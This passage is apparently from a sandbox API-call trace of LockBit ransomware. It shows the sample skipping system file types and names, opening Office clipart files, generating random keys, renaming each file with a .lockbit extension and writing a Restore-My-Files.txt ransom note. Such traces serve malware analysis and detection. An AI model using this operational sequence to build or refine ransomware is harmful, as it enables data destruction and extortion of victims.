-1 [0162.025] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.025] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.026] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.026] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.026] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.026] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.026] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.026] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.026] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.026] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.026] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.026] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.026] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.026] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.026] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.026] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.026] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.026] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00523_.WMF") returned 1 [0162.026] lstrcmpiW (lpString1="ntldr", lpString2="NA00523_.WMF") returned 1 [0162.026] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00523_.WMF") returned 1 [0162.026] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00523_.WMF") returned -1 [0162.026] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00523_.WMF") returned -1 [0162.026] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00523_.WMF") returned 1 [0162.026] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00523_.WMF") returned -1 [0162.026] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.026] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00523_.WMF") returned=".WMF" [0162.026] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.027] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.027] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.028] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.028] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.028] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00523_.WMF.lockbit") returned 72 [0162.028] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00523_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00523_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0162.029] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.029] malloc (_Size=0x40068) returned 0x3df0008 [0162.029] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=28410) returned 1 [0162.029] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.030] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.030] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.030] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.030] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.035] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00523_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00523_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.035] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.035] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.038] free (_Block=0x1fa2ed8) [0162.038] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00523_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.038] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.038] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.038] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6a54b00, ftCreationTime.dwHighDateTime=0x1bd4b20, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6a54b00, ftLastWriteTime.dwHighDateTime=0x1bd4b20, nFileSizeHigh=0x0, nFileSizeLow=0x5880, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00525_.WMF", cAlternateFileName="")) returned 1 [0162.038] lstrcmpiW (lpString1=".", lpString2="NA00525_.WMF") returned -1 [0162.038] lstrcmpiW (lpString1="..", lpString2="NA00525_.WMF") returned -1 [0162.038] PathFindExtensionW (pszPath="NA00525_.WMF") returned=".WMF" [0162.038] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.038] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.038] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.038] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.038] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.038] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.038] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.039] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.039] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00525_.WMF") returned 1 [0162.040] lstrcmpiW (lpString1="ntldr", lpString2="NA00525_.WMF") returned 1 [0162.040] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00525_.WMF") returned 1 [0162.040] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00525_.WMF") returned -1 [0162.040] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00525_.WMF") returned -1 [0162.040] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00525_.WMF") returned 1 [0162.040] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00525_.WMF") returned -1 [0162.040] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.040] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00525_.WMF") returned=".WMF" [0162.040] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.040] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.040] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.041] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.041] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00525_.WMF.lockbit") returned 72 [0162.041] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00525_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0162.043] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.043] malloc (_Size=0x40068) returned 0x3df0008 [0162.043] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=22656) returned 1 [0162.044] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.044] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.044] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.045] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.045] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.049] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00525_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00525_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.049] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.049] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.051] free (_Block=0x1fa2ed8) [0162.051] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00525_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.051] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.052] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.052] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35fc4a00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x35fc4a00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x477c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00530_.WMF", cAlternateFileName="")) returned 1 [0162.054] lstrcmpiW (lpString1=".", lpString2="NA00530_.WMF") returned -1 [0162.054] lstrcmpiW (lpString1="..", lpString2="NA00530_.WMF") returned -1 [0162.054] PathFindExtensionW (pszPath="NA00530_.WMF") returned=".WMF" [0162.054] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.054] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.054] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.054] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.054] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.054] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.054] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.054] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.055] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.055] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.056] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.056] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.056] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.056] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.056] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.056] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.056] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.056] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.056] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.056] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.056] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.056] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.056] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.056] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00530_.WMF") returned 1 [0162.056] lstrcmpiW (lpString1="ntldr", lpString2="NA00530_.WMF") returned 1 [0162.056] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00530_.WMF") returned 1 [0162.056] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00530_.WMF") returned -1 [0162.056] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00530_.WMF") returned -1 [0162.056] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00530_.WMF") returned 1 [0162.056] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00530_.WMF") returned -1 [0162.056] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.056] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00530_.WMF") returned=".WMF" [0162.056] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.056] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.056] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.057] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.057] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00530_.WMF.lockbit") returned 72 [0162.058] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00530_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00530_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0162.059] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.059] malloc (_Size=0x40068) returned 0x3df0008 [0162.059] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: 